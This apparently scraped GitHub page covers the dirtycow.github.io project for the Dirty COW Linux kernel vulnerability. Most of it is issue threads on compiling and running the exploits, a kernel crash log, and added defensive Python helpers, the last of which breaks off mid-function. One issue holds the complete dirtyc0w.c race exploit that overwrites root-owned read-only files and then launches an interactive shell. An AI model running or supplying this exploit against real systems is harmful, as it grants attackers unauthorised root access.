
dirtycow.github.io's Introduction

Dirty COW

Hello

To add a new FAQ entry please send a PR for index.html.

If you wish to learn more, or share what you currently know of the vulnerability head on to the wiki (open to everyone): https://github.com/dirtycow/dirtycow.github.io/wiki

If you already know all you need to know, participate in the challenges and win fame, glory and a t-shirt.

All code, images and documentation in this page and the website is in the public domain (CC0).

dirtycow.github.io's People

Contributors

dirtycow, ericherman, fat-tire, jovanbulck, mheesters, msmeissn


dirtycow.github.io's Issues

DirtyPipe adaptation possible

Was just reading up on the new disclosure of DirtyPipe, a Linux kernel 5.8-5.10.10 exploit. Looks like it allows you to write to read-only files and even read-only mounts.

https://dirtypipe.cm4all.com/

I know the exploit is only on versions of Android 12 and kernel version 5.8 - 5.10.10, so this would basically affect the Pixels and Galaxy S22. Would this allow root privilege escalation on Android? The closest exploit I could find was DirtyCow, which was 4 years ago, and from what I can tell DirtyPipe is easier to exploit. DirtyCow root was lost on reboot, however, and Android has come a long way in terms of security like SELinux since.

Could this project be adapted to root via dirtypipe?

Not working on Linux 2.6.32-25-generic-pae i686

I tried cowroot and dirtyc0w on Linux 2.6.32-25-generic-pae i686 (Ubuntu 10.04.1 LTS) and none of them worked.

On Linux 3.18.0-kali3-586 i686, dirtyc0w did not work. It hangs before replacing the file; the /etc/passwd file is not replaced.

If not affected, prog stays blocked

Hi,

I have patched my system before trying your program, and it stays stuck on:

testc0w@host:/tmp/dirty_cow_test$ ./dirtyc0w foo m00000000000000000
mmap 7f141ebae000

Nothing happens until I press Ctrl + C.

These are the file modes:

testc0w@host:/tmp/dirty_cow_test$ ls -lh
total 20K
-rwxr-xr-x 1 testc0w testc0w 9,7K nov.  13 19:07 dirtyc0w
-rw-r--r-- 1 testc0w testc0w 2,8K nov.  13 19:07 dirtyc0w.c
-r-----r-- 1 root    root      32 nov.  13 19:07 foo

Is this the expected behaviour when there is no problem with the kernel?

Thanks for your help!

Compiler failure!

If I try to compile this on my linux box, I get this:

dirtyc0w.c:64:5: warning: implicit declaration of function ‘lseek’ [-Wimplicit-function-declaration]
     lseek(f,map,SEEK_SET);
     ^
dirtyc0w.c:65:8: warning: implicit declaration of function ‘write’ [-Wimplicit-function-declaration]
     c+=write(f,str,strlen(str));
        ^
dirtyc0w.c: In function ‘main’:
dirtyc0w.c:82:3: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
   fstat(f,&st);
   ^
dirtyc0w.c:96:10: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 2 has type ‘void *’ [-Wformat=]
   printf("mmap %x\n\n",map);
          ^
/tmp/ccZL19lN.o: In function `main':
dirtyc0w.c:(.text+0x1ed): undefined reference to `pthread_create'
dirtyc0w.c:(.text+0x211): undefined reference to `pthread_create'
dirtyc0w.c:(.text+0x222): undefined reference to `pthread_join'
dirtyc0w.c:(.text+0x233): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

uname -a: Linux example.com 3.14.32-xxxx-grs-ipv6-64 #7 SMP Wed Jan 27 18:05:09 CET 2016 x86_64 x86_64 x86_64 GNU/Linux

gcc --version:

gcc (Ubuntu 5.4.0-6ubuntu1~16.04.2) 5.4.0 20160609
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Anyone can delete the wiki

Anyone can open a page to edit, or choose to delete it. I was able to do this and restore the page back to its original state. Perhaps the wiki should be permissioned?

Turning off periodic write back makes exploit stable but crashes kernel in reboot

Hi
My kernel version in a VM is 3.13.0-83-generic x86_64 (Ubuntu 14.04.3 server). I have used the libc-based root exploit. The others crash sometimes. But the libc-based root exploit works fine when executing echo 0 > /proc/sys/vm/dirty_writeback_centisecs after the exploit is done. Everything is fine until I reboot the server, and then it crashes :(
Any help?

Triggering vuln often hangs machines (oops log in post)

Not sure of a better place to share this, so here:

[  377.279334] kernel BUG at /home/user/rpmbuild/BUILD/kernel-4.4.14/linux-4.4.14/fs/ext4/inode.c:2422!
[  377.279352] invalid opcode: 0000 [#1] SMP 
[  377.279368] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[  377.279481] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G           O    4.4.14-11.pvops.qubes.x86_64 #1
[  377.279507] Workqueue: writeback wb_workfn (flush-251:0)
[  377.279523] task: ffff880013799e00 ti: ffff8800137a4000 task.ti: ffff8800137a4000
[  377.279537] RIP: e030:[<ffffffff812acace>]  [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.279563] RSP: e02b:ffff8800137a7918  EFLAGS: 00010246
[  377.279574] RAX: 003fff800001007d RBX: ffff8800137a7938 RCX: 0000000000000000
[  377.279587] RDX: 0000000080000000 RSI: 0000000000000000 RDI: ffff880003b40aa8
[  377.279599] RBP: ffff8800137a79e8 R08: 0000000000000000 R09: 0000000000000040
[  377.279613] R10: 0000000000000000 R11: 0000000000000220 R12: ffffffffffffffff
[  377.279627] R13: 0000000000000800 R14: ffffea00039c1cc0 R15: ffff8800137a7a90
[  377.279655] FS:  0000000000000000(0000) GS:ffff880013e00000(0000) knlGS:ffff880012900000
[  377.279682] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
[  377.279698] CR2: 0000555d8299c6f0 CR3: 0000000011db9000 CR4: 0000000000042660
[  377.279717] Stack:
[  377.279729]  0000000000000000 ffff880003b40aa0 ffff8800137a7938 0000000000000001
[  377.279760]  0000000000000001 0000000000000000 ffffea00039c1cc0 0000000000000000
[  377.279792]  ffff8800137a79a8 ffffffff812f946b fffffffffffffff4 ffff880002400040
[  377.279823] Call Trace:
[  377.279844]  [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[  377.279867]  [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[  377.279889]  [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[  377.279911]  [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[  377.279937]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.279966]  [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[  377.279991]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.280021]  [<ffffffff811adcae>] do_writepages+0x1e/0x30
[  377.280041]  [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[  377.280059]  [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[  377.280059]  [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[  377.280059]  [<ffffffff8124e963>] wb_writeback+0x253/0x310
[  377.280059]  [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[  377.280059]  [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[  377.280059]  [<ffffffff810b724e>] process_one_work+0x15e/0x430
[  377.280059]  [<ffffffff810b756e>] worker_thread+0x4e/0x460
[  377.280059]  [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[  377.280059]  [<ffffffff810bd548>] kthread+0xd8/0xf0
[  377.280059]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.280059]  [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[  377.280059]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.280059] Code: c0 eb a3 4c 89 f7 e8 f2 26 ef ff e9 a1 fe ff ff be 0d 00 00 00 4c 89 f7 e8 60 22 ef ff 49 8b 06 f6 c4 20 0f 84 d3 fe ff ff 0f 0b <0f> 0b 48 8d bd 50 ff ff ff e8 f4 3e f0 ff eb af e8 fd 26 df ff 
[  377.280059] RIP  [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.280059]  RSP <ffff8800137a7918>
[  377.280640] ---[ end trace a311745f90e0a79b ]---
[  377.280656] ------------[ cut here ]------------
[  377.280689] WARNING: CPU: 0 PID: 6 at /home/user/rpmbuild/BUILD/kernel-4.4.14/linux-4.4.14/kernel/exit.c:661 do_exit+0x5f/0xae0()
[  377.280716] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[  377.280870] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G      D    O    4.4.14-11.pvops.qubes.x86_64 #1
[  377.280901] Workqueue: writeback wb_workfn (flush-251:0)
[  377.280920]  0000000000000200 000000001ab54008 ffff8800137a7620 ffffffff813b06f3
[  377.280951]  0000000000000000 ffffffff81a52458 ffff8800137a7658 ffffffff8109f402
[  377.280984]  ffff880013799e00 000000000000000b ffff8800137a7868 0000000000000000
[  377.281018] Call Trace:
[  377.281040]  [<ffffffff813b06f3>] dump_stack+0x63/0x90
[  377.281059]  [<ffffffff8109f402>] warn_slowpath_common+0x82/0xc0
[  377.281077]  [<ffffffff8109f54a>] warn_slowpath_null+0x1a/0x20
[  377.281096]  [<ffffffff810a1d5f>] do_exit+0x5f/0xae0
[  377.281118]  [<ffffffff8101a751>] oops_end+0xa1/0xd0
[  377.281135]  [<ffffffff8101ac0b>] die+0x4b/0x70
[  377.281153]  [<ffffffff81017d21>] do_trap+0xb1/0x140
[  377.281170]  [<ffffffff810180a9>] do_error_trap+0x89/0x110
[  377.281191]  [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.281213]  [<ffffffff8138e6b0>] ? blk_sq_make_request+0x110/0x360
[  377.281233]  [<ffffffff81018610>] do_invalid_op+0x20/0x30
[  377.281251]  [<ffffffff8175849e>] invalid_op+0x1e/0x30
[  377.281296]  [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.281321]  [<ffffffff812ac948>] ? mpage_prepare_extent_to_map+0x148/0x2f0
[  377.281346]  [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[  377.281371]  [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[  377.281396]  [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[  377.281421]  [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[  377.281449]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.281484]  [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[  377.281509]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.281538]  [<ffffffff811adcae>] do_writepages+0x1e/0x30
[  377.281561]  [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[  377.281592]  [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[  377.281617]  [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[  377.281617]  [<ffffffff8124e963>] wb_writeback+0x253/0x310
[  377.281617]  [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[  377.281617]  [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[  377.281617]  [<ffffffff810b724e>] process_one_work+0x15e/0x430
[  377.281617]  [<ffffffff810b756e>] worker_thread+0x4e/0x460
[  377.281617]  [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[  377.281617]  [<ffffffff810bd548>] kthread+0xd8/0xf0
[  377.281617]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.281617]  [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[  377.281617]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.281893] ---[ end trace a311745f90e0a79c ]---
[  377.282484] BUG: unable to handle kernel paging request at ffffffffffffffd8
[  377.282523] IP: [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[  377.282559] PGD 1c0c067 PUD 1c0e067 PMD 0 
[  377.282592] Oops: 0000 [#2] SMP 
[  377.282614] Modules linked in: fuse ip6table_filter ip6_tables xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp crct10dif_pclmul xen_netfront crc32_pclmul crc32c_intel pcspkr dummy_hcd udc_core xen_blkback xenfs xen_privcmd u2mfn(O) xen_blkfront
[  377.283015] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G      D W  O    4.4.14-11.pvops.qubes.x86_64 #1
[  377.283015] task: ffff880013799e00 ti: ffff8800137a4000 task.ti: ffff8800137a4000
[  377.283015] RIP: e030:[<ffffffff810bdbd0>]  [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[  377.283015] RSP: e02b:ffff8800137a75e8  EFLAGS: 00010002
[  377.283015] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff81f18e40
[  377.283015] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff880013799e00
[  377.283015] RBP: ffff8800137a75e8 R08: ffff880013799e88 R09: 0000000000000000
[  377.283015] R10: 0000000000008000 R11: ffff880013799e60 R12: 0000000000000000
[  377.283015] R13: 0000000000016c80 R14: ffff880013799e00 R15: ffff880013e16c80
[  377.283015] FS:  0000000000000000(0000) GS:ffff880013e00000(0000) knlGS:ffff880012900000
[  377.283015] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
[  377.283015] CR2: 0000000000000028 CR3: 0000000012651000 CR4: 0000000000042660
[  377.283015] Stack:
[  377.283015]  ffff8800137a7600 ffffffff810b8641 ffff880013e16c80 ffff8800137a7650
[  377.283015]  ffffffff817523e0 ffff8800137a7610 ffff880000000000 ffff880013799e00
[  377.283015]  ffff8800137a8000 ffff88001379a4c8 ffff8800137a76a0 ffff8800137a7210
[  377.283015] Call Trace:
[  377.283015]  [<ffffffff810b8641>] wq_worker_sleeping+0x11/0x90
[  377.283015]  [<ffffffff817523e0>] __schedule+0x520/0x790
[  377.283015]  [<ffffffff81752685>] schedule+0x35/0x80
[  377.283015]  [<ffffffff810a247e>] do_exit+0x77e/0xae0
[  377.283015]  [<ffffffff8101a751>] oops_end+0xa1/0xd0
[  377.283015]  [<ffffffff8101ac0b>] die+0x4b/0x70
[  377.283015]  [<ffffffff81017d21>] do_trap+0xb1/0x140
[  377.283015]  [<ffffffff810180a9>] do_error_trap+0x89/0x110
[  377.283015]  [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.283015]  [<ffffffff8138e6b0>] ? blk_sq_make_request+0x110/0x360
[  377.283015]  [<ffffffff81018610>] do_invalid_op+0x20/0x30
[  377.283015]  [<ffffffff8175849e>] invalid_op+0x1e/0x30
[  377.283015]  [<ffffffff812acace>] ? mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.283015]  [<ffffffff812ac948>] ? mpage_prepare_extent_to_map+0x148/0x2f0
[  377.283015]  [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[  377.283015]  [<ffffffff812b0920>] ? ext4_writepages+0x3b0/0xd70
[  377.283015]  [<ffffffff812dfc6d>] ? __ext4_journal_start_sb+0x6d/0x120
[  377.283015]  [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[  377.283015]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.283015]  [<ffffffff811ab82b>] ? generic_writepages+0x5b/0x80
[  377.283015]  [<ffffffff810e7e21>] ? __raw_callee_save___pv_queued_spin_unlock+0x11/0x20
[  377.283015]  [<ffffffff811adcae>] do_writepages+0x1e/0x30
[  377.283015]  [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[  377.283015]  [<ffffffff8124e1e2>] writeback_sb_inodes+0x262/0x600
[  377.283015]  [<ffffffff8124e60c>] __writeback_inodes_wb+0x8c/0xc0
[  377.283015]  [<ffffffff8124e963>] wb_writeback+0x253/0x310
[  377.283015]  [<ffffffff8123b841>] ? get_nr_dirty_inodes+0x51/0x80
[  377.283015]  [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[  377.283015]  [<ffffffff810b724e>] process_one_work+0x15e/0x430
[  377.283015]  [<ffffffff810b756e>] worker_thread+0x4e/0x460
[  377.283015]  [<ffffffff810b7520>] ? process_one_work+0x430/0x430
[  377.283015]  [<ffffffff810bd548>] kthread+0xd8/0xf0
[  377.283015]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.283015]  [<ffffffff81756c8f>] ret_from_fork+0x3f/0x70
[  377.283015]  [<ffffffff810bd470>] ? kthread_create_on_node+0x190/0x190
[  377.283015] Code: 02 00 00 48 c7 c7 b8 34 a5 81 e8 7c 19 fe ff e9 bb fe ff ff 0f 1f 80 00 00 00 00 0f 1f 44 00 00 48 8b 87 08 05 00 00 55 48 89 e5 <48> 8b 40 d8 5d c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 
[  377.283015] RIP  [<ffffffff810bdbd0>] kthread_data+0x10/0x20
[  377.283015]  RSP <ffff8800137a75e8>
[  377.283015] CR2: ffffffffffffffd8
[  377.283015] ---[ end trace a311745f90e0a79d ]---
[  377.283015] Fixing recursive fault but reboot is needed!
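Reading an oops like the one above by hand is slow when several of them arrive from a fleet. The parser below is an added example (not code from the dirtycow project or from the issue's author) that pulls out the fields an incident responder triages first: the BUG location, taint flags, kernel release, the workqueue that was running, the symbol at RIP, the reliable call-trace frames (frames marked `?` are guesses by the unwinder and are dropped), the trace id, and whether the kernel asked for a reboot. It runs on an excerpt of the trace posted above; the result keys and the `in_writeback_worker` helper are my own naming.

```python
import re
from typing import Any, Dict

# Excerpt of the oops posted in the issue above (trimmed to the lines the parser needs).
SAMPLE_OOPS = """\
[  377.279334] kernel BUG at /home/user/rpmbuild/BUILD/kernel-4.4.14/linux-4.4.14/fs/ext4/inode.c:2422!
[  377.279352] invalid opcode: 0000 [#1] SMP
[  377.279481] CPU: 0 PID: 6 Comm: kworker/u4:0 Tainted: G           O    4.4.14-11.pvops.qubes.x86_64 #1
[  377.279507] Workqueue: writeback wb_workfn (flush-251:0)
[  377.279537] RIP: e030:[<ffffffff812acace>]  [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.279823] Call Trace:
[  377.279844]  [<ffffffff812f946b>] ? jbd2__journal_start+0xdb/0x1e0
[  377.279911]  [<ffffffff812b0943>] ext4_writepages+0x3d3/0xd70
[  377.280021]  [<ffffffff811adcae>] do_writepages+0x1e/0x30
[  377.280041]  [<ffffffff8124d9e5>] __writeback_single_inode+0x45/0x330
[  377.280059]  [<ffffffff8124f1cf>] wb_workfn+0x2df/0x3f0
[  377.280059]  [<ffffffff810b724e>] process_one_work+0x15e/0x430
[  377.280059] Code: c0 eb a3 4c 89 f7 e8 f2 26 ef ff 0f 0b <0f> 0b 48 8d bd 50 ff ff ff
[  377.280059] RIP  [<ffffffff812acace>] mpage_prepare_extent_to_map+0x2ce/0x2f0
[  377.280640] ---[ end trace a311745f90e0a79b ]---
[  377.283015] Fixing recursive fault but reboot is needed!
"""

_PREFIX_RE = re.compile(r"^\[\s*\d+\.\d+\]\s?")          # "[  377.279334] " timestamp prefix
_BUG_RE = re.compile(r"kernel BUG at (\S+):(\d+)!")
_TAINT_RE = re.compile(r"Tainted: (.+?)\s+(\S+) #\d+$")   # flags, then the kernel release
_WQ_RE = re.compile(r"Workqueue: (\S+) (\S+)")
_RIP_RE = re.compile(r"RIP: .*\]\s+(\w+)\+0x")            # symbol at the faulting instruction
_FRAME_RE = re.compile(r"\[<[0-9a-f]+>\]\s+(\?\s+)?(\w+)\+0x")
_END_RE = re.compile(r"---\[ end trace ([0-9a-f]+) \]---")


def parse_oops(text: str) -> Dict[str, Any]:
    """Extract the triage fields from a kernel oops dump (first oops wins for scalar fields)."""
    result: Dict[str, Any] = {
        "bug_file": None, "bug_line": None,
        "tainted": [],          # e.g. ['G', 'O']; 'O' means an out-of-tree module is loaded
        "kernel": None,
        "workqueue": None,      # (workqueue name, work function) when a kworker crashed
        "crash_symbol": None,
        "call_trace": [],       # reliable frames only
        "trace_ids": [],
        "reboot_needed": False,
    }
    in_trace = False
    for raw in text.splitlines():
        line = _PREFIX_RE.sub("", raw).rstrip()
        if (m := _BUG_RE.search(line)) and result["bug_file"] is None:
            result["bug_file"], result["bug_line"] = m.group(1), int(m.group(2))
        elif (m := _TAINT_RE.search(line)) and result["kernel"] is None:
            result["tainted"], result["kernel"] = m.group(1).split(), m.group(2)
        elif (m := _WQ_RE.search(line)) and result["workqueue"] is None:
            result["workqueue"] = (m.group(1), m.group(2))
        elif (m := _RIP_RE.search(line)) and result["crash_symbol"] is None:
            result["crash_symbol"] = m.group(1)
        elif line.startswith("Call Trace:"):
            in_trace = True
        elif line.startswith("Code:"):
            in_trace = False
        elif m := _END_RE.search(line):
            result["trace_ids"].append(m.group(1))
            in_trace = False
        elif in_trace and (m := _FRAME_RE.search(line)) and m.group(1) is None:
            result["call_trace"].append(m.group(2))
        if "reboot is needed" in line:
            result["reboot_needed"] = True
    return result


def in_writeback_worker(parsed: Dict[str, Any]) -> bool:
    """True when the crash sits in the periodic page-writeback path (workqueue or frames)."""
    wq = parsed.get("workqueue")
    frames = parsed.get("call_trace") or []
    return (wq is not None and wq[0] == "writeback") or any(
        "writeback" in f or f.startswith("wb_") for f in frames)


def summarize(parsed: Dict[str, Any]) -> str:
    loc = f"{parsed['bug_file']}:{parsed['bug_line']}" if parsed["bug_file"] else "unknown location"
    return (f"kernel {parsed['kernel']} tainted={''.join(parsed['tainted']) or '-'} "
            f"BUG at {loc} in {parsed['crash_symbol']}; "
            f"{len(parsed['call_trace'])} reliable frames; reboot_needed={parsed['reboot_needed']}")


if __name__ == "__main__":
    print(summarize(parse_oops(SAMPLE_OOPS)))
```

Feed it the full dmesg rather than the excerpt and `trace_ids` will list every oops in the cascade (the post above shows three), which is a quick way to tell a single BUG from the recursive-fault sequence that ends in a forced reboot.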

When I run the exploit the server crashes & reboots

Hey,
After executing the exploit (/etc/passwd based root) my server crashes. What should I do?
Kernel : Linux nsxxxxxx.ip-xx-xx-xx.eu 3.17.2-xxxx-grs-ipv6-64 #1 SMP Sat Nov 1 12:29:58 CET 2014 x86_64 Intel(R) Xeon(R) CPU E5-1650 v2 @ 3.50GHz GenuineIntel GNU/Linux

Thanks.

A library is missing

I try to use both dirtycow and dirtycow 2 rootcow, and then the following error appears:

./C0w: /lib/i386-linux-gnu/i686/cmov/libc.so.6: version `GLIBC_2.33' not found (required by ./C0w)

Since I don't have root access, I can't update the system to include that libc version.

Difference between the various root access methods

Hi,

Just wanted to understand about the different type of root access mentioned in the PoC page.

The root access methods mentioned are libc based, SUID based and vDSO based. Could you please point me in the right direction for further understanding of the root privilege methods mentioned?

Thanks.

"Am I affected by the bug?" is misleading

I went to this site on my Mac and saw:

Am I affected by the bug?
Nope.

When I read that, I interpreted this as meaning: This may be a security hole, but it's not a huge deal; we're just making a funny page for it for the hell of it. You don't have to worry about any Linux servers you maintain.

I did not interpret it as meaning "The particular web browser you're using to access this page runs on a system that isn't affected by the bug."

I'd suggest being more clear. (Plus, it doesn't actually detect whether you're running a fixed kernel or not, so even if you understand that the text is dynamic, it's not that helpful.)

Get root shell added a line to get root shell pushing for browser root

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
  return NULL;
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
  return NULL;
}


int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);

  execl("/system/bin/sh", "sh", "-i", NULL);

return 0;
}

PoC page

PoC page not showing up, it tells you to make a new page.

-lpthread or -pthread (and suppressing warnings)

Minor thing, but dirtyc0w.c says to build with:

 gcc -lpthread dirtyc0w.c -o dirtyc0w

This (at least for me, gcc 6.2.0) results in errors:

 undefined reference to `pthread_create'
 undefined reference to `pthread_join'

Using:

 gcc -pthread dirtyc0w.c -o dirtyc0w

Works fine. Also some warnings can be gotten rid of by adding

 #include <sys/stat.h>
 #include <unistd.h>

I got rid of the rest by adding:

 #include <stdint.h>

Then changing:

 lseek(f,map,SEEK_SET);

to

 lseek(f, (uintptr_t) map,SEEK_SET);

and

 printf("mmap %x\n\n",map);

to

 printf("mmap %x\n\n",(uintptr_t) map);

Dunno if this is correct (it very well may not be), but it builds quietly for me now on my Raspberry Pi. So there ya go.

Instructions and Testing

Was just testing this out in a few ways on Debian 8.6 (3.16.0-4-amd64)

With the instructions for creating the foo file and chmod 0404'ing it to root, I was still able to edit the file with vim using w! or qw!

Also, after compiling using gcc I couldn't get the program to actually alter, say, the sudoers or shadow file.

Vim editing read-only files is nothing new I believe, but has anyone managed to use this exploit on a protected file of some kind?
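The vim observation in the issue above is worth separating from the vulnerability itself, because the two succeed for different reasons. The script below is an added example (not code from the dirtycow project or from the issue's author) that reproduces both mechanisms side by side on a file it creates in a temporary directory: writing into a read-only inode, which is what Dirty COW's race achieves and what the mode bits normally refuse, versus writing a fresh file and renaming it over the old name, which needs only write permission on the directory and is in effect what an editor's forced save does when the file itself is not writable. It also shows the control a defender actually has over the second case: with the directory locked down, the rename path is refused too. The file is owned by the current user rather than root (so the demo runs unprivileged), and the result keys are my own naming; a root user bypasses the mode bits in both cases, which the `euid_is_root` flag records.

```python
import os
import shutil
import tempfile
from typing import Any, Dict

# Constructed stand-in for the 'foo' file from the PoC recipe (owned by us, not by root).
ORIGINAL = b"this is not a test\n"


def demo_replace_vs_write() -> Dict[str, Any]:
    """Contrast writing into a read-only inode with replacing its directory entry."""
    workdir = tempfile.mkdtemp(prefix="cow_demo_")
    target = os.path.join(workdir, "foo")
    out: Dict[str, Any] = {"euid_is_root": os.geteuid() == 0}
    try:
        with open(target, "wb") as fh:
            fh.write(ORIGINAL)
        os.chmod(target, 0o444)            # read-only for everyone, like the chmod 0404 'foo'
        inode_before = os.stat(target).st_ino

        # 1. Write into the existing inode. This is what the Dirty COW race achieves;
        #    without the bug the mode bits refuse it (root bypasses DAC, hence the flag above).
        try:
            with open(target, "r+b") as fh:
                fh.write(b"m00000000000000000")
            out["inplace_write_denied"] = False
        except PermissionError:
            out["inplace_write_denied"] = True

        # 2. Write a new file and rename it over the old name. Only the directory's write
        #    bit matters here, so the file's own 0444 mode does not protect it.
        staging = target + ".new"
        with open(staging, "wb") as fh:
            fh.write(b"replaced via rename\n")
        try:
            os.replace(staging, target)
            out["replaced_by_rename"] = True
        except PermissionError:
            out["replaced_by_rename"] = False
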